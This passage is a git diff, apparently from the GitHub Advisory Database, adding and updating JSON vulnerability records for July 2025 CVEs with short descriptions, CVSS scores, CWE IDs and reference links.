"database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-f272-f7h4-54qg/GHSA-f272-f7h4-54qg.json b/advisories/unreviewed/2025/07/GHSA-f272-f7h4-54qg/GHSA-f272-f7h4-54qg.json new file mode 100644 index 0000000000000..e649ac68cf4af --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-f272-f7h4-54qg/GHSA-f272-f7h4-54qg.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f272-f7h4-54qg", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-7798" + ], + "details": "A vulnerability classified as critical has been found in Beijing Shenzhou Shihan Technology Multimedia Integrated Business Display System up to 8.2. This affects an unknown part of the file /admin/system/structure/getdirectorydata/web/baseinfo/companyManage. The manipulation of the argument Struccture_ID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7798" + }, + { + "type": "WEB", + "url": "https://github.com/qiantx/cve/blob/main/cve1.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316863" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316863" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616739" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T19:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f5hc-g46g-fv5f/GHSA-f5hc-g46g-fv5f.json b/advisories/unreviewed/2025/07/GHSA-f5hc-g46g-fv5f/GHSA-f5hc-g46g-fv5f.json index 9c752930dd940..8dd1892404e6e 100644 --- a/advisories/unreviewed/2025/07/GHSA-f5hc-g46g-fv5f/GHSA-f5hc-g46g-fv5f.json +++ b/advisories/unreviewed/2025/07/GHSA-f5hc-g46g-fv5f/GHSA-f5hc-g46g-fv5f.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-gw6j-gjcx-2747/GHSA-gw6j-gjcx-2747.json b/advisories/unreviewed/2025/07/GHSA-gw6j-gjcx-2747/GHSA-gw6j-gjcx-2747.json new file mode 100644 index 0000000000000..a0a976b7790bc --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-gw6j-gjcx-2747/GHSA-gw6j-gjcx-2747.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gw6j-gjcx-2747", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-50581" + ], + "details": "MRCMS v3.1.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/group/save.do.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50581" + }, + { + "type": "WEB", + "url": "https://github.com/SimonKang949/Vulnerabilities/issues/6" + }, + { + "type": "WEB", + "url": "https://gitee.com/marker/MRCMS" + }, + { + "type": "WEB", + "url": "http://mrcms.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T21:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h568-mfp5-v835/GHSA-h568-mfp5-v835.json b/advisories/unreviewed/2025/07/GHSA-h568-mfp5-v835/GHSA-h568-mfp5-v835.json new file mode 100644 index 0000000000000..6914c64b93316 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h568-mfp5-v835/GHSA-h568-mfp5-v835.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h568-mfp5-v835", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-54310" + ], + "details": "qBittorrent before 5.1.2 does not prevent access to a local file that is referenced in a link URL. This affects rsswidget.cpp and searchjobwidget.cpp.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54310" + }, + { + "type": "WEB", + "url": "https://github.com/qbittorrent/qBittorrent/commit/6ad073e0bc26c1f9d3530490ece611b49f5bfcab" + }, + { + "type": "WEB", + "url": "https://github.com/qbittorrent/qBittorrent/commit/ad68813fe879ba245a4f41f105ed8d2114a92971" + }, + { + "type": "WEB", + "url": "https://www.qbittorrent.org/news#wed-jul-02nd-2025---qbittorrent-v5.1.2-release" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-669" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T20:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h65x-jjv9-8c48/GHSA-h65x-jjv9-8c48.json b/advisories/unreviewed/2025/07/GHSA-h65x-jjv9-8c48/GHSA-h65x-jjv9-8c48.json new file mode 100644 index 0000000000000..23e71fdbdd272 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h65x-jjv9-8c48/GHSA-h65x-jjv9-8c48.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h65x-jjv9-8c48", + "modified": "2025-07-18T21:30:31Z", + "published": "2025-07-18T21:30:31Z", + "aliases": [ + "CVE-2025-7806" + ], + "details": "A vulnerability classified as critical was found in Tenda FH451 1.0.0.9. This vulnerability affects the function fromSafeClientFilter of the file /goform/SafeClientFilter. The manipulation of the argument Go/page leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7806" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromSafeClientFilter_Go.md" + }, + { + "type": "WEB", + "url": "https://github.com/panda666-888/vuls/blob/main/tenda/fh451/fromSafeClientFilter_page.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316882" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316882" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616348" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616349" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T21:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hrfv-4245-jm2h/GHSA-hrfv-4245-jm2h.json b/advisories/unreviewed/2025/07/GHSA-hrfv-4245-jm2h/GHSA-hrfv-4245-jm2h.json new file mode 100644 index 0000000000000..18f9cfeb3196a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hrfv-4245-jm2h/GHSA-hrfv-4245-jm2h.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hrfv-4245-jm2h", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-52169" + ], + "details": "agorum Software GmbH Agorum core open v11.9.2 & v11.10.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52169" + }, + { + "type": "WEB", + "url": "https://herolab.usd.de/security-advisories/usd-2025-0026" + }, + { + "type": "WEB", + "url": "http://agorum.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T19:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j9wg-hp22-g525/GHSA-j9wg-hp22-g525.json b/advisories/unreviewed/2025/07/GHSA-j9wg-hp22-g525/GHSA-j9wg-hp22-g525.json new file mode 100644 index 0000000000000..2de340f56d8b9 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j9wg-hp22-g525/GHSA-j9wg-hp22-g525.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j9wg-hp22-g525", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-50585" + ], + "details": "StudentManage v1.0 was discovered to contain a SQL injection vulnerability via the component /admin/adminStudentUrl.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50585" + }, + { + "type": "WEB", + "url": "https://github.com/SimonKang949/Vulnerabilities/issues/2" + }, + { + "type": "WEB", + "url": "https://gitee.com/DayCloud/student-manage" + }, + { + "type": "WEB", + "url": "http://studentmanage.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T19:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mhfx-j9x5-v427/GHSA-mhfx-j9x5-v427.json b/advisories/unreviewed/2025/07/GHSA-mhfx-j9x5-v427/GHSA-mhfx-j9x5-v427.json index 8732156bf6a9a..50169c6b4289a 100644 --- a/advisories/unreviewed/2025/07/GHSA-mhfx-j9x5-v427/GHSA-mhfx-j9x5-v427.json +++ b/advisories/unreviewed/2025/07/GHSA-mhfx-j9x5-v427/GHSA-mhfx-j9x5-v427.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mhfx-j9x5-v427", - "modified": "2025-07-18T18:30:30Z", + "modified": "2025-07-18T21:30:29Z", "published": "2025-07-18T18:30:30Z", "aliases": [ "CVE-2025-52168" ], "details": "Incorrect access control in the dynawebservice component of agorum Software GmbH Agorum core open v11.9.2 & v11.10.1 allows unauthenticated attackers to access arbitrary files on the system.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-18T18:15:24Z" diff --git a/advisories/unreviewed/2025/07/GHSA-pr3f-84fh-7r83/GHSA-pr3f-84fh-7r83.json b/advisories/unreviewed/2025/07/GHSA-pr3f-84fh-7r83/GHSA-pr3f-84fh-7r83.json new file mode 100644 index 0000000000000..98ff7cae7d06c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pr3f-84fh-7r83/GHSA-pr3f-84fh-7r83.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pr3f-84fh-7r83", + "modified": "2025-07-18T21:30:29Z", + "published": "2025-07-18T21:30:29Z", + "aliases": [ + "CVE-2025-33014" + ], + "details": "IBM Sterling B2B Integrator and IBM Sterling File Gateway 6.0.0.0 through 6.1.2.7 and 6.2.0.0 through 6.2.0.4 uses a web link with untrusted references to an external site. A remote attacker could exploit this vulnerability to expose sensitive information or perform unauthorized actions on the victims’ web browser.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33014" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7240065" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1022" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T19:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pr48-hfmc-f9vq/GHSA-pr48-hfmc-f9vq.json b/advisories/unreviewed/2025/07/GHSA-pr48-hfmc-f9vq/GHSA-pr48-hfmc-f9vq.json index 673dbe5c3148b..2b47cea0eb4b4 100644 --- a/advisories/unreviewed/2025/07/GHSA-pr48-hfmc-f9vq/GHSA-pr48-hfmc-f9vq.json +++ b/advisories/unreviewed/2025/07/GHSA-pr48-hfmc-f9vq/GHSA-pr48-hfmc-f9vq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pr48-hfmc-f9vq", - "modified": "2025-07-18T18:30:29Z", + "modified": "2025-07-18T21:30:28Z", "published": "2025-07-18T18:30:29Z", "aliases": [ "CVE-2025-45157" ], "details": "Insecure permissions in Splashin iOS v2.0 allow unauthorized attackers to access location data for specific users.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-18T17:15:30Z" diff --git a/advisories/unreviewed/2025/07/GHSA-q3r2-78g7-7mh4/GHSA-q3r2-78g7-7mh4.json b/advisories/unreviewed/2025/07/GHSA-q3r2-78g7-7mh4/GHSA-q3r2-78g7-7mh4.json index 7f62cb0a986b1..c3b5b28262864 100644 --- a/advisories/unreviewed/2025/07/GHSA-q3r2-78g7-7mh4/GHSA-q3r2-78g7-7mh4.json +++ b/advisories/unreviewed/2025/07/GHSA-q3r2-78g7-7mh4/GHSA-q3r2-78g7-7mh4.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-qfm9-m9jj-jr8j/GHSA-qfm9-m9jj-jr8j.json b/advisories/unreviewed/2025/07/GHSA-qfm9-m9jj-jr8j/GHSA-qfm9-m9jj-jr8j.json new file mode 100644 index 0000000000000..53f353cdc3ce3 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-qfm9-m9jj-jr8j/GHSA-qfm9-m9jj-jr8j.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfm9-m9jj-jr8j", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-7801" + ], + "details": "A vulnerability has been found in BossSoft CRM 6.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /crm/module/HNDCBas_customPrmSearchDtl.jsp. The manipulation of the argument cstid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7801" + }, + { + "type": "WEB", + "url": "https://github.com/cc2024k/CVE/issues/1" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316867" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316867" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616840" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T19:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-qmr8-m22m-86vv/GHSA-qmr8-m22m-86vv.json b/advisories/unreviewed/2025/07/GHSA-qmr8-m22m-86vv/GHSA-qmr8-m22m-86vv.json new file mode 100644 index 0000000000000..6aeb7dff7a55c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-qmr8-m22m-86vv/GHSA-qmr8-m22m-86vv.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qmr8-m22m-86vv", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-7802" + ], + "details": "A vulnerability was found in PHPGurukul Complaint Management System 2.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/complaint-search.php. The manipulation of the argument Search leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7802" + }, + { + "type": "WEB", + "url": "https://github.com/N1n3b9S/cve/issues/7" + }, + { + "type": "WEB", + "url": "https://phpgurukul.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.316868" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.316868" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.616740" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T19:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-r7q6-6fmq-mx4c/GHSA-r7q6-6fmq-mx4c.json b/advisories/unreviewed/2025/07/GHSA-r7q6-6fmq-mx4c/GHSA-r7q6-6fmq-mx4c.json index 14c7ab5fb6c55..91d27e98c345c 100644 --- a/advisories/unreviewed/2025/07/GHSA-r7q6-6fmq-mx4c/GHSA-r7q6-6fmq-mx4c.json +++ b/advisories/unreviewed/2025/07/GHSA-r7q6-6fmq-mx4c/GHSA-r7q6-6fmq-mx4c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r7q6-6fmq-mx4c", - "modified": "2025-07-18T15:31:57Z", + "modified": "2025-07-18T21:30:27Z", "published": "2025-07-18T15:31:57Z", "aliases": [ "CVE-2025-46002" ], "details": "An issue in Filemanager v2.5.0 and below allows attackers to execute a directory traversal via sending a crafted HTTP request to the filemanager.php endpoint.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -52,8 +57,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-23" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-18T14:15:24Z" diff --git a/advisories/unreviewed/2025/07/GHSA-rh5q-v9ww-rqgm/GHSA-rh5q-v9ww-rqgm.json b/advisories/unreviewed/2025/07/GHSA-rh5q-v9ww-rqgm/GHSA-rh5q-v9ww-rqgm.json new file mode 100644 index 0000000000000..680c4c2ddebc0 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rh5q-v9ww-rqgm/GHSA-rh5q-v9ww-rqgm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rh5q-v9ww-rqgm", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-54309" + ], + "details": "CrushFTP 10 before 10.8.5 and 11 before 11.3.4_23, when the DMZ proxy feature is not used, mishandles AS2 validation and consequently allows remote attackers to obtain admin access via HTTPS, as exploited in the wild in July 2025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54309" + }, + { + "type": "WEB", + "url": "https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-420" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T19:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rmmj-8q9v-qxh2/GHSA-rmmj-8q9v-qxh2.json b/advisories/unreviewed/2025/07/GHSA-rmmj-8q9v-qxh2/GHSA-rmmj-8q9v-qxh2.json index 8674c3bcdac4f..af8018db8c954 100644 --- a/advisories/unreviewed/2025/07/GHSA-rmmj-8q9v-qxh2/GHSA-rmmj-8q9v-qxh2.json +++ b/advisories/unreviewed/2025/07/GHSA-rmmj-8q9v-qxh2/GHSA-rmmj-8q9v-qxh2.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rmmj-8q9v-qxh2", - "modified": "2025-07-18T18:30:30Z", + "modified": "2025-07-18T21:30:29Z", "published": "2025-07-18T18:30:30Z", "aliases": [ "CVE-2025-52166" ], "details": "Incorrect access control in Software GmbH Agorum core open v11.9.2 & v11.10.1 allows authenticated attackers to escalate privileges to Administrator and access sensitive components and information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-18T18:15:24Z" diff --git a/advisories/unreviewed/2025/07/GHSA-v33m-2fqw-vhxg/GHSA-v33m-2fqw-vhxg.json b/advisories/unreviewed/2025/07/GHSA-v33m-2fqw-vhxg/GHSA-v33m-2fqw-vhxg.json index 9dbe6b5168d70..61e99ffde3121 100644 --- a/advisories/unreviewed/2025/07/GHSA-v33m-2fqw-vhxg/GHSA-v33m-2fqw-vhxg.json +++ b/advisories/unreviewed/2025/07/GHSA-v33m-2fqw-vhxg/GHSA-v33m-2fqw-vhxg.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-284" + "CWE-284", + "CWE-434" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-vv2c-jqcc-c7hq/GHSA-vv2c-jqcc-c7hq.json b/advisories/unreviewed/2025/07/GHSA-vv2c-jqcc-c7hq/GHSA-vv2c-jqcc-c7hq.json new file mode 100644 index 0000000000000..36f5346864008 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vv2c-jqcc-c7hq/GHSA-vv2c-jqcc-c7hq.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vv2c-jqcc-c7hq", + "modified": "2025-07-18T21:30:30Z", + "published": "2025-07-18T21:30:30Z", + "aliases": [ + "CVE-2025-50708" + ], + "details": "An issue in Perplexity AI GPT-4 v.2.51.0 allows a remote attacker to obtain sensitive information via the token component in the shared chat URL", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50708" + }, + { + "type": "WEB", + "url": "https://github.com/mano257200/perplexity/blob/main/README.md" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T20:15:24Z" + } +} \ No newline at end of file From adf6485ff09f7520543c1fa7707fcfbade87b53a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 19 Jul 2025 00:34:09 +0000 Subject: [PATCH 023/323] Publish Advisories GHSA-g6x8-5jj7-qqfv GHSA-gwf6-g75x-69vq GHSA-h9v3-wvxh-4mwp GHSA-jgh6-fqf6-cpj8 GHSA-qr33-gf7m-pq45 GHSA-x33r-pvvq-wjrh --- .../GHSA-g6x8-5jj7-qqfv.json | 36 ++++++++++++ .../GHSA-gwf6-g75x-69vq.json | 56 +++++++++++++++++++ .../GHSA-h9v3-wvxh-4mwp.json | 34 +++++++++++ .../GHSA-jgh6-fqf6-cpj8.json | 36 ++++++++++++ .../GHSA-qr33-gf7m-pq45.json | 34 +++++++++++ .../GHSA-x33r-pvvq-wjrh.json | 34 +++++++++++ 6 files changed, 230 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-g6x8-5jj7-qqfv/GHSA-g6x8-5jj7-qqfv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-gwf6-g75x-69vq/GHSA-gwf6-g75x-69vq.json create mode 100644 advisories/unreviewed/2025/07/GHSA-h9v3-wvxh-4mwp/GHSA-h9v3-wvxh-4mwp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-jgh6-fqf6-cpj8/GHSA-jgh6-fqf6-cpj8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-qr33-gf7m-pq45/GHSA-qr33-gf7m-pq45.json create mode 100644 advisories/unreviewed/2025/07/GHSA-x33r-pvvq-wjrh/GHSA-x33r-pvvq-wjrh.json diff --git a/advisories/unreviewed/2025/07/GHSA-g6x8-5jj7-qqfv/GHSA-g6x8-5jj7-qqfv.json b/advisories/unreviewed/2025/07/GHSA-g6x8-5jj7-qqfv/GHSA-g6x8-5jj7-qqfv.json new file mode 100644 index 0000000000000..79ef2a05d21c2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-g6x8-5jj7-qqfv/GHSA-g6x8-5jj7-qqfv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g6x8-5jj7-qqfv", + "modified": "2025-07-19T00:32:31Z", + "published": "2025-07-19T00:32:31Z", + "aliases": [ + "CVE-2025-7395" + ], + "details": "A certificate verification error in wolfSSL when building with the WOLFSSL_SYS_CA_CERTS and WOLFSSL_APPLE_NATIVE_CERT_VALIDATION options results in the wolfSSL\n client failing to properly verify the server certificate's domain name,\n allowing any certificate issued by a trusted CA to be accepted regardless of the hostname.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:D/RE:X/U:Red" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7395" + }, + { + "type": "WEB", + "url": "http://github.com/wolfssl/wolfssl.git" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-18T23:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-gwf6-g75x-69vq/GHSA-gwf6-g75x-69vq.json b/advisories/unreviewed/2025/07/GHSA-gwf6-g75x-69vq/GHSA-gwf6-g75x-69vq.json new file mode 100644 index 0000000000000..991a376f17535 --- /dev/null +++ 